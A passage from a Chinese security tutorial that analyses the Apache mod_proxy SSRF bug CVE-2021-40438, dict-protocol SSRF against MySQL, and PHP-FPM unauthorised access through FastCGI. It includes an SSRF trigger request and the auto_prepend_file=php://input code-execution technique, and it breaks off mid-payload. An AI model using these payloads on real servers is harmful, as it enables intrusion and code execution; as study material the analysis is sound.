2024全网最全面及最新且最为详细的网络安全技巧五 之 SSRF 漏洞EXP技巧,典例分析以及 如何修复 (上册)———— 作者:LJS

  • 五——SSRF漏洞 EXP技巧,典例分析以及 如何修复

  • 目录

    五——SSRF EXP技巧,典例分析以及 如何修复

    5.1Apache mod_proxy SSRF(CVE-2021-40438)的一点分析和延伸

    0x01 Apache Module综述

    0x02 漏洞原理分析

    Apache在配置反代的后端服务器时,有两种情况:

    当满足这三个条件后,将unix:后面的内容进行解析,设置成uds_path的值;将字符|后面的内容,设置成rurl的值。

    这个函数中有三个主要的部分,

    0x03 限制绕过

    那么如何让ap_runtime_dir_relative的返回值是null?

    0x04 mod_proxy_fcgi是否存在漏洞?

    0x05 哪些模块受到影响

    5.2Dict协议是什么

    dict 的初体验

    dict 协议是啥

    5.3Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写

    Fastcgi Record

    Fastcgi Type

    PHP-FPM(FastCGI进程管理器)

    Nginx(IIS7)解析漏洞

    security.limit_extensions配置

    任意代码执行

    但PHP是一门强大的语言,PHP.INI中有两个有趣的配置项,auto_prepend_file和auto_append_file。

    那么,我们怎么设置auto_prepend_file的值?

    EXP编写


  • 5.1Apache mod_proxy SSRF(CVE-2021-40438)的一点分析和延伸

  • 0x01 Apache Module综述

  • 如果我们要部署一个PHP运行环境,且将Apache作为Web应用服务器,那么常用的有三种方法:
  • Apache以CGI的形式运行PHP脚本

  • PHP以mod_php的方式作为Apache的一个模块运行

  • PHP以FPM的方式运行为独立服务,Apache使用mod_proxy_fcgi模块作为反代服务器将请求代理给PHP-FPM

  • 第一种方式比较古老,性能较差,基本已经淘汰;第二种方式在Apache环境下使用较广,配置最为简单;第三种方法也有较大用户体量,不过Apache仅作为一个中间的反代服务器,更多新的用户会选择使用性能更好的Nginx替代。
  • 这其中,第三种方法使用的mod_proxy_fcgi就是本文主角mod_proxy模块的一个子模块。mod_proxy是Apache服务器中用于反代后端服务的一个
  • 一个模块,而它拥有数个不同功能的子模块,分别用于支持不同通信协议的后端,比如常见的有:
  • mod_proxy_fcgi 用于反代后端是fastcgi协议的服务,比如php-fpm

  • mod_proxy_http 用于反代后端是http、https协议的服务

  • mod_proxy_uwsgi 用于反代后端是uwsgi协议的服务,主要针对uWSGI

  • mod_proxy_ajp 用于反代后端是ajp协议的服务,主要针对Tomcat

  • mod_proxy_ftp 用于反代后端是ftp协议的服务

  • 除去mod_proxy_fcgi用于反代PHP,我们在使用Node.js、Python等脚本语言编写的应用也常常会使用mod_proxy_http作为一层反代服务器,这样中间层可以做ACL、静态文件服务等。
  • 这次的SSRF漏洞是出在mod_proxy这个模块中的,我们就来从代码的层面分析一下它的原理是什么,究竟影响有多大。
  • 0x02 漏洞原理分析

  • 《Building a POC for CVE-2021-40438》这篇文章中提到了这个漏洞的复现方法:当目标环境使用了mod_proxy做反向代理,比如ProxyPass / "http://localhost:8000/",此时通过请求http://target/?unix:{'A'*5000}|http://example.com/即可向http://example.com发送请求,造成一个SSRF攻击。
  • 这里面,Apache代码中犯得错误是在modules/proxy/proxy_util.c的fix_uds_filename函数:
  • /** In the case of the reverse proxy, we need to see if we* were passed a UDS url (eg: from mod_proxy) and adjust uds_path* as required.*/
    static void fix_uds_filename(request_rec *r, char **url) 
    {char *ptr, *ptr2;// 检查传入的 request_rec 是否为空,以及是否存在有效的 r->filenameif (!r || !r->filename) return;// 检查 r->filename 是否以 "proxy:" 开头,并且包含 "unix:" 字符串,并且包含 '|' 字符if (!strncmp(r->filename, "proxy:", 6) &&(ptr2 = ap_strcasestr(r->filename, "unix:")) &&(ptr = ap_strchr(ptr2, '|'))) {apr_uri_t urisock;apr_status_t rv;// 将 '|' 替换为字符串结束符 '\0',以便后续解析*ptr = '\0';// 解析 URI,填充 urisock 结构体rv = apr_uri_parse(r->pool, ptr2, &urisock);if (rv == APR_SUCCESS) {char *rurl = ptr + 1; // rurl 指向 '|' 后的路径部分char *sockpath = ap_runtime_dir_relative(r->pool, urisock.path);// 将解析得到的 Unix 域套接字路径存储到请求的 notes 表中apr_table_setn(r->notes, "uds_path", sockpath);// 复制 rurl 到 url,保留 scheme 部分(因为需要用于 UDS)*url = apr_pstrdup(r->pool, rurl);// 将 r->filename 中 "proxy:" 后的部分替换为 rurl,以更新请求的 filenamememmove(r->filename + 6, rurl, strlen(rurl) + 1);// 记录调试日志,指示由于 UDS 的重写 URLap_log_rerror(APLOG_MARK, APLOG_TRACE2, 0, r,"*: rewrite of url due to UDS(%s): %s (%s)",sockpath, *url, r->filename);}else {// 如果解析 URI 失败,恢复 '|' 字符*ptr = '|';}}
    }
    
  • Apache在配置反代的后端服务器时,有两种情况:
  • 直接使用某个协议反代到某个IP和端口,比如ProxyPass / "http://localhost:8080"

  • 使用某个协议反代到unix套接字,比如ProxyPass / "unix:/var/run/www.sock|http://localhost:8080/"

  • 第一种情况比较好理解,第二种情况的设计我觉得不是很好,相当于让用户可以使用一个Apache自创的写法来配置后端地址。那么这时候就会涉及到parse的过程,需要将这种自创的语法转换成能兼容正常socket连接的结构,而fix_uds_filename函数就是做这个事情的。
  • 使用字符串文法来表示多种含义的方式通常暗藏一些漏洞,比如这里,进入这个if语句需要满足三个条件:
  • r->filename的前6个字符等于proxy:

  • r->filename的字符串中含有关键字unix:

  • unix:关键字后的部分含有字符|

  • 当满足这三个条件后,unix:后面的内容进行解析,设置成uds_path的值;将字符|后面的内容,设置成rurl的值。
  • 举个例子,前面介绍中的ProxyPass / "unix:/var/run/www.sock|http://localhost:8080/",在解析完成后,uds_path的值等于/var/run/www.sockrurl的值等于http://localhost:8080/
  • 看到这里其实都没有什么问题,那么我们肯定会思考,r->filename是从哪来的,用户可控吗,为什么?
  • 这时就要说到另一个函数,proxy_hook_canon_handler,这个函数用于注册canon handler,比如:
  • image-20211017234354615.png

  • 可以看到,每一个mod_proxy_xxx都会注册一个自己的canon handler,canon handler会在反代的时候被调用,用于告诉Apache主程序它应该把这个请求交给哪个处理方法来处理。
  • 比如,我们看到mod_proxy_httpproxy_http_canon函数:
  • static int proxy_http_canon(request_rec *r, char *url)
    {const char *scheme = NULL;  // 存储 URL 的 scheme,如 "http" 或 "https"const char *host = NULL;    // 存储主机名或 IP 地址const char *path = NULL;    // 存储 URL 的路径部分const char *search = NULL;  // 存储 URL 的查询字符串部分int port, def_port;         // 端口号和默认端口号char sport[7];              // 存储端口号的字符串形式,如 ":80"char enc_path[512];         // 存储经过编码处理的路径部分// first part: 检查 URL 的 scheme,并处理if (strncasecmp(url, "http:", 5) == 0) {url += 5;               // 移动指针,跳过 "http:"scheme = "http";        // 设置 scheme 为 "http"}else if (strncasecmp(url, "https:", 6) == 0) {url += 6;               // 移动指针,跳过 "https:"scheme = "https";       // 设置 scheme 为 "https"}else {return DECLINED;        // 如果不是以 "http:" 或 "https:" 开头,则返回处理失败}port = def_port = ap_proxy_port_of_scheme(scheme);  // 获取对应 scheme 的默认端口号// second part: 根据请求类型和标记处理 URL 的主机名和端口号ap_proxy_canon_netloc(r->pool, &url, NULL, NULL, &host, &port);switch (r->proxyreq) {default: /* wtf are we doing here? */case PROXYREQ_REVERSE:// 对于反向代理,检查是否设置了 "proxy-nocanon" 标记if (apr_table_get(r->notes, "proxy-nocanon")) {path = url;   // 如果设置了标记,直接使用原始的路径部分}else {// 否则,对路径进行规范化和编码处理path = ap_proxy_canonenc(r->pool, url, strlen(url),enc_path, 0, r->proxyreq);search = r->args;  // 获取请求的查询字符串}break;case PROXYREQ_PROXY:path = url;  // 对于正向代理,直接使用原始的路径部分break;}// 检查路径是否有效if (path == NULL)return HTTP_BAD_REQUEST;// 如果端口不是默认端口,则格式化端口号字符串if (port != def_port)apr_snprintf(sport, sizeof(sport), ":%d", port);elsesport[0] = '\0';  // 否则置为空字符串// 如果主机名包含 ':',则将其视为 IPv6 地址,加上方括号if (ap_strchr_c(host, ':')) { /* if literal IPv6 address */host = apr_pstrcat(r->pool, "[", host, "]", NULL);}// fourth part: 构建最终的 filename 字符串,表示代理请求的目标 URLr->filename = apr_pstrcat(r->pool, "proxy:", scheme, "://", host, sport,"/", path, (search) ? "?" : "", (search) ? search : "", NULL);return OK;  // 返回处理成功
    }
    
  • 这个函数中有三个主要的部分,
  • 第一部分检查了配置中的url的开头是不是http:https:,如果不是,说明这个请求不该由mod_proxy_http模块处理,后续的过程跳过;
  • 第二部分,用各种方式获取到scheme、host、port、path、search等几个URL的组成变量;
  • 第三部分,拼接proxy:、scheme、://、host、sport、/、path、search,成为一个字符串,赋值给r->filename
  • 这里面,scheme、host、sport来自于配置文件中配置的ProxyPass,而path、search来自于用户发送的数据包。也就是说,r->filename中的后半部分是用户可控的。
  • 那我们回看前面的fix_uds_filename函数,它在r->filename中查找关键字unix:,并将这个关键字后面直到|的部分作为unix套接字地址,而将|后面的部分作为反代的后端地址。
  • 我们可以通过请求的path或者search来控制这两个部分,控制了反代的后端地址,这也就是为什么这里会出现SSRF的原因。
  • 0x03 限制绕过

  • 当然,这里面有一个问题,那就是Apache在正常情况下,因为识别到了unix套接字,所以会把用户请求发送给这个本地文件套接字,而不是后端URL。
  • 可以来做个测试,我们发送这样一个请求:
  • GET /?unix:/var/run/test.sock|http://example.com/ HTTP/1.1
    
  • 此时会得到一个503错误,错误日志会反馈这样的结果:
  • [Mon Oct 18 00:14:38.634795 2021] [proxy:error] [pid 782180:tid 140737306797824] (2)No such file or directory: AH02454: HTTP: attempt to connect to Unix domain socket /var/run/test.sock (192.168.1.1) failed
    [Mon Oct 18 00:14:38.634875 2021] [proxy_http:error] [pid 782180:tid 140737306797824] [client 192.168.1.142:59696] AH01114: HTTP: failed to make connection to backend: httpd-UDS
  • 找不到unix套接字/var/run/test.sock,这是当然。
  • 我们不能让他把请求发送到unix套接字上,而是发送给我们需要的|后面的地址。
  • 国外那位作者给出了一个非常巧妙的方法,在fix_uds_filename函数中,unix套接字的地址来自于下面这两行代码:
  • char *sockpath = ap_runtime_dir_relative(r->pool, urisock.path);
    apr_table_setn(r->notes, "uds_path", sockpath);
  • 如果这里ap_runtime_dir_relative函数返回值是null,则后面获取uds_path时将不会使用unix套接字地址,而变成普通的TCP连接:
  • uds_path = (*worker->s->uds_path ? worker->s->uds_path : apr_table_get(r->notes, "uds_path"));
    if (uds_path) {if (conn->uds_path == NULL) {/* use (*conn)->pool instead of worker->cp->pool to match lifetime */conn->uds_path = apr_pstrdup(conn->pool, uds_path);}// ...conn->hostname = "httpd-UDS";conn->port = 0;
    }
    else {// ...conn->hostname = apr_pstrdup(conn->pool, uri->hostname);conn->port = uri->port;// ...
    }
  • 那么如何让ap_runtime_dir_relative的返回值是null?
  • ap_runtime_dir_relative函数最后引用了apr库中的apr_filepath_merge函数,它的主要作用就是路径的join,用于处理相对路径、绝对路径、../连接。
  • 这个函数中,当待join的两段路径长度+4大于APR_PATH_MAX,也就是4096的时候,则函数会返回一个路径过长的状态码,导致最后unix套接字的值是null
  • rootlen = strlen(rootpath);
    maxlen = rootlen + strlen(addpath) + 4; /* 4 for slashes at start, after* root, and at end, plus trailing* null */
    if (maxlen > APR_PATH_MAX) {return APR_ENAMETOOLONG;
    }
  • 也就是说,我们只需要在unix:|之间传入内容长度大概超过4092的字符串,就能构造出uds_path为null的结果,让Apache不再发送请求给unix套接字。
  • 最后,这样构造出的请求成功触发SSRF漏洞:
  • image-20211018010400594.png

  •  Apache官方对这个漏洞的修复也比较简单,因为用户只能控制r->filename的后半部分,而前半部分proxy:{scheme}://{host}{sport}/来自于配置文件,所以最新版改成检查其开头是不是proxy:unix:,这一部分用户无法控制
  • 0x04 mod_proxy_fcgi是否存在漏洞?

  • 我们前文都以mod_proxy_http作为例子来研究,而在Apache+PHP环境下,mod_proxy_fcgi的使用频率更高,那么它是否也会被SSRF漏洞影响呢?
  • 这个漏洞出现在modules/proxy/proxy_util.c的fix_uds_filename函数,理论上是mod_proxy的漏洞,那么它的子模块应该都会被影响,但这个漏洞中有一个很关键的变量是r->filename,他是否可控决定了后面的利用是否可以成功。
  • 我们看一下mod_proxy_fcgi的canon函数:
  • static int proxy_fcgi_canon(request_rec *r, char *url)
    {char *host, sport[7];  // 定义变量 host 和 sport 数组,sport 数组用于存储端口号字符串const char *err;       // 错误信息字符串char *path;            // 路径字符串apr_port_t port, def_port;  // 端口号变量fcgi_req_config_t *rconf = NULL;  // FastCGI 请求配置const char *pathinfo_type = NULL;  // 路径信息类型if (ap_cstr_casecmpn(url, "fcgi:", 5) == 0) {url += 5;  // 如果 url 以 "fcgi:" 开头,则移动指针到路径的起始位置}else {return DECLINED;  // 如果不以 "fcgi:" 开头,则拒绝处理该请求}// ...if (apr_table_get(r->notes, "proxy-nocanon")) {path = url;   // 如果在请求的 notes 中找到了 "proxy-nocanon" 键,则使用原始路径}else {path = ap_proxy_canonenc(r->pool, url, strlen(url), enc_path, 0, r->proxyreq);// 否则,使用 ap_proxy_canonenc 函数对 URL 进行规范化编码}if (path == NULL)return HTTP_BAD_REQUEST;  // 如果路径为空,返回 HTTP_BAD_REQUEST 错误// 构建完整的文件名,格式为 "proxy:fcgi://host:sport/path"r->filename = apr_pstrcat(r->pool, "proxy:fcgi://", host, sport, "/", path, NULL);// ...
    }
    
  • 可见,这里的r->filename等于proxy:fcgi://{host}{sport}/{path}相比于mod_proxy_http少了search。不过,path仍然是用户可以控制的,我们可以尝试发送这样的数据包:
  • GET /unix:testtest|http://example.com/1.php HTTP/1.1
    ...
  • 经过调试可见,path中的|ap_proxy_canonenc函数编码成了%7C:
  • image-20211018013708745.png

  • 没有|,后面也就无法完成SSRF利用了。
  • 0x05 哪些模块受到影响

  • 那么,我们其实可以认为,如果r->filename有部分可控,且可控的部分没有被编码(不是path),这个模块就会受到SSRF漏洞的影响。
  • 对这个结论我没有逐一测试考证,我仅挑选另一个较为常用的模块mod_proxy_ajp来复现漏洞。
  • mod_proxy_ajp是用于反代Tomcat的一个Apache模块,Tomcat在8.5.51版本以前默认会开启两个端口8080和8009,分别对应HTTP协议和AJP协议。HTTP协议好理解,AJP协议是一个二进制协议,通信协议相比起来效率更高。所以以前很多运维人员会将Tomcat假设在Apache之后,然后二者之间使用AJP协议通信。
  • Tomcat 8.5.51之后的版本受到Ghostcat漏洞影响不再默认开放8009端口。

  • Apache下有两个模块能实现AJP的反代通信:
  • mod_proxy_ajp 这就是mod_proxy的一个子模块,由Apache HTTPd官方维护

  • mod_jk 这是Tomcat官方维护的一个Apache模块,更加出名用户也更多

  • 由于mod_jk不是用mod_proxy的代码,所以不受到影响,我们今天仅测试mod_proxy_ajp。
  • 简单部署一个开放8009端口的Tomcat服务器,并配置好mod_proxy_ajp进行调试,可见其proxy_ajp_canon函数r->filename中是包含search的:
  • static int proxy_ajp_canon(request_rec *r, char *url)
    {char *host, *path, sport[7];char *search = NULL;const char *err;apr_port_t port, def_port;/* ap_port_of_scheme() */if (strncasecmp(url, "ajp:", 4) == 0) {url += 4;  // 如果 URL 以 "ajp:" 开头,移动指针到路径的起始位置}else {return DECLINED;  // 如果不以 "ajp:" 开头,则拒绝处理该请求}// 构建完整的文件名,格式为 "proxy:ajp://host:sport/path?search"r->filename = apr_pstrcat(r->pool, "proxy:ajp://", host, sport,"/", path, (search) ? "?" : "",(search) ? search : "", NULL);return OK;  // 返回 OK 表示处理成功
    }
    
  • 那么按照我们的预测,这里也会存在SSRF漏洞。果然测试成功:
  •  那么,mod_proxy_http2、mod_proxy_balancer、mod_proxy_wstunnel等这些模块也会受到影响,而mod_proxy_uwsgi、mod_proxy_scgi等模块不受影响。我没有严格验证,有兴趣的同学可以自己下去调试一下,也许还能找到绕过方法。

  • 5.2Dict协议是什么

  • 最近在学校 ssrf 攻击,看到可以用 dict 协议可以加载一个 tcp 端口的提供的服务所返回的部分数据。但是网上很少 dict 协议相关的说明,直到我找到了这个网站:感谢这个博客,让俺明白了啥是 dict 协议
  • dict 的初体验

  • 多说无益,直接上一个用了 dict 协议的服务让你们来体验一下
  • 首先在你的电脑上安装一个 telnet 客户端 Windows 和 Mac / Linux 上应该都有对应的客户端
  • 安装好了以后用这个命令来登录(由于编码原因,有些非英文字符在某些系统上可能会乱码)
  • telnet dict.org 2628
  • 之后如果连接上了,能看到对应的提示:
  • 220 dict.dict.org dictd 1.12.1/rf on Linux 4.19.0-10-amd64 <auth.mime><56180310.14213.1628480435@dict.dict.org>
  • 在终端中输入 h 来获取帮助
  • 113 help text follows
    DEFINE database word         -- look up word in database
    MATCH database strategy word -- match word in database using strategy
    SHOW DB                      -- list all accessible databases
    SHOW DATABASES               -- list all accessible databases
    SHOW STRAT                   -- list available matching strategies
    SHOW STRATEGIES              -- list available matching strategies
    SHOW INFO database           -- provide information about the database
    SHOW SERVER                  -- provide site-specific information
    OPTION MIME                  -- use MIME headers
    CLIENT info                  -- identify client to server
    AUTH user string             -- provide authentication information
    STATUS                       -- display timing information
    HELP                         -- display this help information
    QUIT                         -- terminate connectionThe following commands are unofficial server extensions for debugging
    only.  You may find them useful if you are using telnet as a client.
    If you are writing a client, you MUST NOT use these commands, since
    they won't be supported on any other server!D word                       -- DEFINE * word
    D database word              -- DEFINE database word
    M word                       -- MATCH * . word
    M strategy word              -- MATCH * strategy word
    M database strategy word     -- MATCH database strategy word
    S                            -- STATUS
    H                            -- HELP
    Q                            -- QUIT
  • 在终端中输入以下命令(这个东西貌似不区分大小写的样子)来列出所有的字典
  • image.png

  • 最后我们看到了 english 这个字典
  • 在最后我们输入 define [字典名] [单词] 这样的命令来获取一个单词的解释
  • 比如说
  •  define english hello
  • image.png

  • 服务器就会返回对应的单词解释
  • dict 协议是啥

  • dict 协议是一个在线网络字典协议,这个协议是用来架设一个字典服务的。不过貌似用的比较少,所以网上基本没啥资料(包括谷歌上)。可以看到用这个协议架设的服务可以用 telnet 来登陆,说明这个协议应该是基于 tcp 协议开发的。
  • 所以像 mysql 的服务,因为也是基于 tcp 协议开发,所以用 dict 协议的方式打开也能强行读取一些 mysql 服务的返回内容
  • 比如说下面这段程序:
  • <?php// 文件名: main.php$url = "dict://localhost:3306"; // localhost:3306 上架设了我的 mysql 服务$ch = curl_init($url);
    curl_exec($ch);
    curl_close($ch);
  • 输出结果:
  • image.png

  • 可以看到虽然乱码,但是还是强行读取出来了一些可以辨识的数据,比如说 mysql 的版本号

  • 5.3Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写

  • 搭过php相关环境的同学应该对fastcgi不陌生,那么fastcgi究竟是什么东西,为什么nginx可以通过fastcgi来对接php?
  • Fastcgi Record

  • Fastcgi其实是一个通信协议,和HTTP协议一样,都是进行数据交换的一个通道。
  • HTTP协议是浏览器和服务器中间件进行数据交换的协议,浏览器将HTTP头和HTTP体用某个规则组装成数据包,以TCP的方式发送到服务器中间件,服务器中间件按照规则将数据包解码,并按要求拿到用户需要的数据,再以HTTP协议的规则打包返回给服务器。
  • 类比HTTP协议来说,fastcgi协议则是服务器中间件和某个语言后端进行数据交换的协议。
  • Fastcgi协议由多个record组成,record也有header和body一说,服务器中间件将这二者按照fastcgi的规则封装好发送给语言后端,语言后端解码以后拿到具体数据,进行指定操作,并将结果再按照该协议封装好后返回给服务器中间件。
  • 和HTTP头不同,record的头固定8个字节,body是由头中的contentLength指定,其结构如下:
  • typedef struct {/* Header */unsigned char version; // 版本unsigned char type; // 本次record的类型unsigned char requestIdB1; // 本次record对应的请求idunsigned char requestIdB0;unsigned char contentLengthB1; // body体的大小unsigned char contentLengthB0;unsigned char paddingLength; // 额外块大小unsigned char reserved; /* Body */unsigned char contentData[contentLength];unsigned char paddingData[paddingLength];
    } FCGI_Record;
  • 头由8个uchar类型的变量组成,每个变量1字节。其中,requestId占两个字节,一个唯一的标志id,以避免多个请求之间的影响;contentLength占两个字节,表示body的大小。
  • 语言端解析了fastcgi头以后,拿到contentLength,然后再在TCP流里读取大小等于contentLength的数据,这就是body体。
  • Body后面还有一段额外的数据(Padding),其长度由头中的paddingLength指定,起保留作用。不需要该Padding的时候,将其长度设置为0即可。
  • 可见,一个fastcgi record结构最大支持的body大小是2^16,也就是65536字节。
  • Fastcgi Type

  • 刚才我介绍了fastcgi一个record中各个结构的含义,其中第二个字节type我没详说。
  • type就是指定该record的作用。因为fastcgi一个record的大小是有限的,作用也是单一的,所以我们需要在一个TCP流里传输多个record。通过type来标志每个record的作用,用requestId作为同一次请求的id。
  • 也就是说,每次请求,会有多个record,他们的requestId是相同的。
  • 借用该文章中的一个表格,列出最主要的几种type
  • 14931267923354.jpg

  • 看了这个表格就很清楚了,服务器中间件和后端语言通信,第一个数据包就是type为1的record,后续互相交流,发送type为4、5、6、7的record,结束时发送type为2、3的record。
  • 当后端语言接收到一个type为4的record后,就会把这个record的body按照对应的结构解析成key-value对,这就是环境变量。环境变量的结构如下:
  • typedef struct {unsigned char nameLengthB0;  /* nameLengthB0  >> 7 == 0 */unsigned char valueLengthB0; /* valueLengthB0 >> 7 == 0 */unsigned char nameData[nameLength];unsigned char valueData[valueLength];
    } FCGI_NameValuePair11;typedef struct {unsigned char nameLengthB0;  /* nameLengthB0  >> 7 == 0 */unsigned char valueLengthB3; /* valueLengthB3 >> 7 == 1 */unsigned char valueLengthB2;unsigned char valueLengthB1;unsigned char valueLengthB0;unsigned char nameData[nameLength];unsigned char valueData[valueLength((B3 & 0x7f) << 24) + (B2 << 16) + (B1 << 8) + B0];
    } FCGI_NameValuePair14;typedef struct {unsigned char nameLengthB3;  /* nameLengthB3  >> 7 == 1 */unsigned char nameLengthB2;unsigned char nameLengthB1;unsigned char nameLengthB0;unsigned char valueLengthB0; /* valueLengthB0 >> 7 == 0 */unsigned char nameData[nameLength((B3 & 0x7f) << 24) + (B2 << 16) + (B1 << 8) + B0];unsigned char valueData[valueLength];
    } FCGI_NameValuePair41;typedef struct {unsigned char nameLengthB3;  /* nameLengthB3  >> 7 == 1 */unsigned char nameLengthB2;unsigned char nameLengthB1;unsigned char nameLengthB0;unsigned char valueLengthB3; /* valueLengthB3 >> 7 == 1 */unsigned char valueLengthB2;unsigned char valueLengthB1;unsigned char valueLengthB0;unsigned char nameData[nameLength((B3 & 0x7f) << 24) + (B2 << 16) + (B1 << 8) + B0];unsigned char valueData[valueLength((B3 & 0x7f) << 24) + (B2 << 16) + (B1 << 8) + B0];
    } FCGI_NameValuePair44;
  • 这其实是4个结构,至于用哪个结构,有如下规则:
  • key、value均小于128字节,用FCGI_NameValuePair11

  • key大于128字节,value小于128字节,用FCGI_NameValuePair41

  • key小于128字节,value大于128字节,用FCGI_NameValuePair14

  • key、value均大于128字节,用FCGI_NameValuePair44

  • 为什么我只介绍type为4的record?因为环境变量在后面PHP-FPM里有重要作用,之后写代码也会写到这个结构。type的其他情况,大家可以自己翻文档理解理解。
  • PHP-FPM(FastCGI进程管理器)

  • 那么,PHP-FPM又是什么东西?
  • FPM其实是一个fastcgi协议解析器,Nginx等服务器中间件将用户请求按照fastcgi的规则打包好通过TCP传给谁?其实就是传给FPM。
  • FPM按照fastcgi的协议将TCP流解析成真正的数据。
  • 举个例子,用户访问http://127.0.0.1/index.php?a=1&b=2,如果web目录是/var/www/html,那么Nginx会将这个请求变成如下key-value对:
  • {'GATEWAY_INTERFACE': 'FastCGI/1.0',         # FastCGI协议版本'REQUEST_METHOD': 'GET',                    # HTTP请求方法'SCRIPT_FILENAME': '/var/www/html/index.php',  # 正在执行的脚本文件的文件系统路径'SCRIPT_NAME': '/index.php',                # 当前脚本的路径'QUERY_STRING': '?a=1&b=2',                 # 传递给脚本的查询字符串'REQUEST_URI': '/index.php?a=1&b=2',         # 包含查询字符串的完整请求URI'DOCUMENT_ROOT': '/var/www/html',           # 服务器的文档根目录'SERVER_SOFTWARE': 'php/fcgiclient',        # 服务器软件和版本信息'REMOTE_ADDR': '127.0.0.1',                 # 客户端的IP地址'REMOTE_PORT': '12345',                     # 客户端的端口号'SERVER_ADDR': '127.0.0.1',                 # 服务器的IP地址'SERVER_PORT': '80',                        # 服务器的端口号'SERVER_NAME': "localhost",                 # 服务器的名称'SERVER_PROTOCOL': 'HTTP/1.1'               # 使用的HTTP协议版本
    }
    
  • 这个数组其实就是PHP中$_SERVER数组的一部分,也就是PHP里的环境变量。但环境变量的作用不仅是填充$_SERVER数组,也是告诉fpm:“我要执行哪个PHP文件”。
  • PHP-FPM拿到fastcgi的数据包后,进行解析,得到上述这些环境变量。然后,执行SCRIPT_FILENAME的值指向的PHP文件,也就是/var/www/html/index.php
  • Nginx(IIS7)解析漏洞

  • Nginx和IIS7曾经出现过一个PHP相关的解析漏洞(测试环境),该漏洞现象是,在用户访问http://127.0.0.1/favicon.ico/.php时,访问到的文件是favicon.ico,但却按照.php后缀解析了。
  • 用户请求http://127.0.0.1/favicon.ico/.php,nginx将会发送如下环境变量到fpm里:
  • {...'SCRIPT_FILENAME': '/var/www/html/favicon.ico/.php',  # 正在执行的脚本文件的文件系统路径,这里看起来像是一个错误的路径,包含了不应该有的"/.php"'SCRIPT_NAME': '/favicon.ico/.php',                   # 当前脚本的路径,同样反映了错误的路径结构'REQUEST_URI': '/favicon.ico/.php',                   # 包含查询字符串的完整请求URI,同样反映了错误的路径结构'DOCUMENT_ROOT': '/var/www/html',                     # 服务器的文档根目录,正常情况下是正确的路径...
    }
    
  • 正常来说,SCRIPT_FILENAME的值是一个不存在的文件/var/www/html/favicon.ico/.php,是PHP设置中的一个选项fix_pathinfo导致了这个漏洞。
  • PHP为了支持Path Info模式而创造了fix_pathinfo,在这个选项被打开的情况下,fpm会判断SCRIPT_FILENAME是否存在,如果不存在则去掉最后一个/及以后的所有内容,再次判断文件是否存在,往次循环,直到文件存在。
  • 所以,第一次fpm发现/var/www/html/favicon.ico/.php不存在,则去掉/.php,再判断/var/www/html/favicon.ico是否存在。显然这个文件是存在的,于是被作为PHP文件执行,导致解析漏洞。
  • 正确的解决方法有两种:
  • 一是在Nginx端使用fastcgi_split_path_info将path info信息去除后,用tryfiles判断文件是否存在;
  • 二是借助PHP-FPM的security.limit_extensions 配置项,避免其他后缀文件被解析。
  • security.limit_extensions配置

  • 写到这里,PHP-FPM未授权访问漏洞也就呼之欲出了。PHP-FPM默认监听9000端口,如果这个端口暴露在公网,则我们可以自己构造fastcgi协议,和fpm进行通信。
  • 此时,SCRIPT_FILENAME的值就格外重要了。因为fpm是根据这个值来执行php文件的,如果这个文件不存在,fpm会直接返回404:
  • 在fpm某个版本之前,我们可以将SCRIPT_FILENAME的值指定为任意后缀文件,比如/etc/passwd;但后来,fpm的默认配置中增加了一个选项security.limit_extensions
  • ; Limits the extensions of the main script FPM will allow to parse. This can
    ; prevent configuration mistakes on the web server side. You should only limit
    ; FPM to .php extensions to prevent malicious users to use other extensions to
    ; exectute php code.
    ; Note: set an empty value to allow all extensions.
    ; Default Value: .php
    ;security.limit_extensions = .php .php3 .php4 .php5 .php7
  •  其限定了只有某些后缀的文件允许被fpm执行,默认是.php所以,当我们再传入/etc/passwd的时候,将会返回Access denied.
  • 14931290357686.jpg

  •  ps. 这个配置也会影响Nginx解析漏洞,我觉得应该是因为Nginx当时那个解析漏洞,促成PHP-FPM增加了这个安全选项。另外,也有少部分发行版安装中security.limit_extensions默认为空,此时就没有任何限制了。
  • 由于这个配置项的限制,如果想利用PHP-FPM的未授权访问漏洞,首先就得找到一个已存在的PHP文件。
  • 万幸的是,通常使用源安装php的时候,服务器上都会附带一些php后缀的文件,我们使用
  • find / -name "*.php"
  • 来全局搜索一下默认环境:
  • 14931297810961.jpg

  • 找到了不少。这就给我们提供了一条思路,假设我们爆破不出来目标环境的web目录,我们可以找找默认源安装后可能存在的php文件,比如/usr/local/lib/php/PEAR.php
  • 任意代码执行

  • 那么,为什么我们控制fastcgi协议通信的内容,就能执行任意PHP代码呢?
  • 理论上当然是不可以的,即使我们能控制SCRIPT_FILENAME让fpm执行任意文件,也只是执行目标服务器上的文件,并不能执行我们需要其执行的文件。
  • 但PHP是一门强大的语言,PHP.INI中有两个有趣的配置项,auto_prepend_fileauto_append_file
  • auto_prepend_file是告诉PHP,在执行目标文件之前,先包含auto_prepend_file中指定的文件;
  • auto_append_file是告诉PHP,在执行完成目标文件后,包含auto_append_file指向的文件。
  • 那么就有趣了,假设我们设置auto_prepend_filephp://input,那么就等于在执行任何php文件前都要包含一遍POST的内容。所以,我们只需要把待执行的代码放在Body中,他们就能被执行了。(当然,还需要开启远程文件包含选项allow_url_include
  • 那么,我们怎么设置auto_prepend_file的值?
  • 这又涉及到PHP-FPM的两个环境变量,PHP_VALUEPHP_ADMIN_VALUE。这两个环境变量就是用来设置PHP配置项的,
  • PHP_VALUE可以设置模式为PHP_INI_USERPHP_INI_ALL的选项,PHP_ADMIN_VALUE可以设置所有选项。disable_functions除外,这个选项是PHP加载的时候就确定了,在范围内的函数直接不会被加载到PHP上下文中)
  • 所以,我们最后传入如下环境变量:
  • {'GATEWAY_INTERFACE': 'FastCGI/1.0',       # FastCGI协议的版本号'REQUEST_METHOD': 'GET',                 # 请求方法是GET'SCRIPT_FILENAME': '/var/www/html/index.php',  # 当前脚本的文件路径'SCRIPT_NAME': '/index.php',             # 当前脚本的名称'QUERY_STRING': '?a=1&b=2',              # 查询字符串'REQUEST_URI': '/index.php?a=1&b=2',     # 请求的URI,包括查询字符串'DOCUMENT_ROOT': '/var/www/html',        # 文档根目录'SERVER_SOFTWARE': 'php/fcgiclient',     # 服务器软件信息'REMOTE_ADDR': '127.0.0.1',              # 客户端的IP地址'REMOTE_PORT': '12345',                  # 客户端的端口号'SERVER_ADDR': '127.0.0.1',              # 服务器的IP地址'SERVER_PORT': '80',                     # 服务器的端口号'SERVER_NAME': "localhost",              # 服务器的主机名'SERVER_PROTOCOL': 'HTTP/1.1'            # 使用的协议版本'PHP_VALUE': 